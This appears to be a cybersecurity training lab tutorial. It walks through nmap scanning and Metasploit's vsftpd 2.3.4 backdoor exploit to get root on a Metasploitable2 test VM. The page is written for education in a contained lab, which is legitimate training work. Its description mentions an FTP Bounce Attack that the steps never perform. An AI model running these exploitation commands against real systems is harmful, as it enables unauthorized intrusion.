Introduction
In this lab, you will learn how to exploit vulnerabilities in the File Transfer Protocol (FTP) service to gain unauthorized access to a target machine. The scenario is set in a cybersecurity context, where you will assume the role of an ethical hacker tasked with identifying and exploiting vulnerabilities in a vulnerable FTP server.
The objective of this lab is to gain root access to the Metasploitable2 target machine by leveraging an FTP service vulnerability and utilizing the Metasploit Framework, a popular penetration testing tool. Through this hands-on experience, you will gain a deeper understanding of the FTP Bounce Attack, port scanning techniques, and the exploitation process using Metasploit.
Set up the Lab Environment
In this step, you will set up the lab environment, which consists of two virtual machines: the Kali Linux machine as the attacker, and the Metasploitable2 machine as the target.
- Start the Metasploitable2 virtual machine by running the following command in the terminal:
sudo virsh start Metasploitable2
- Verify that the Metasploitable2 machine is running by pinging it:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
- Launch the Kali Linux container and enter its bash shell:
docker run -ti --network host b5b709a49cd5 bash
- Test the network connectivity between the Kali Linux container and the Metasploitable2 machine:
ping 192.168.122.102
Press Ctrl+C to stop the ping.
Now both the attack machine and the target machine are running, and you can start the penetration testing.
Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.
Perform Port Scanning
In this step, you will use the Nmap scanning tool to identify open ports and services running on the Metasploitable2 target machine.
- Start the PostgreSQL database service, which is required by Metasploit:
service postgresql start
- Initialize the Metasploit database:
msfdb init
- Launch the Metasploit Framework console:
cd ~
msfconsole
- Use Nmap to scan the target machine and identify open ports:
nmap -sV -T4 192.168.122.102
The -sV option enables version detection for open ports, and -T4 sets the timing policy for faster scanning.
Press Ctrl+D to quit the Metasploit console then start the inspection
Exploit the FTP Service Vulnerability
In this step, you will leverage the identified FTP service vulnerability to gain unauthorized access to the Metasploitable2 target machine.
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- Search for an FTP scanner module in Metasploit:
search scanner/ftp
- Use the
ftp_versionmodule to scan the FTP service:
use auxiliary/scanner/ftp/ftp_version
- Set the target host for the scan:
set RHOSTS 192.168.122.102
- Run the FTP version scan:
exploit
- Based on the FTP version identified, search for a corresponding exploitation module:
search vsFTPd
- Use the
vsftpd_234_backdoormodule to exploit the vulnerability:
use exploit/unix/ftp/vsftpd_234_backdoor
- Set the target host for the exploitation:
set RHOST 192.168.122.102
- Execute the exploitation:
exploit
Press Ctrl+D to quit the Metasploit console then start the inspection
Verify the Successful Exploitation
In this step, you will verify that the exploitation was successful and you have gained root access to the Metasploitable2 target machine.
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- Check the current user:
whoami
- Check the hostname of the compromised machine:
hostname
- Check the IP address of the compromised machine:
ifconfig
Press Ctrl+D to quit the Metasploit console then start the inspection
Summary
In this lab, you learned how to exploit an FTP service vulnerability to gain unauthorized access to a target machine. You set up a lab environment with a vulnerable Metasploitable2 machine and a Kali Linux attack machine. You performed port scanning using Nmap to identify open ports and services, and then leveraged the Metasploit Framework to exploit an identified FTP service vulnerability. Finally, you verified the successful exploitation by checking the current user, hostname, and IP address of the compromised machine.
Through this hands-on experience, you gained practical knowledge and skills in identifying and exploiting vulnerabilities, using popular cybersecurity tools like Nmap and Metasploit, and understanding the FTP Bounce Attack technique. These skills are essential for ethical hackers and cybersecurity professionals to assess and strengthen the security posture of systems and networks.
π Practice Now: Exploiting FTP Service Vulnerabilities
Want to Learn More?
- π³ Learn the latest Cybersecurity Skill Trees
- π Read More Cybersecurity Tutorials
- π¬ Join our Discord or tweet us @WeAreLabEx
Top comments (0)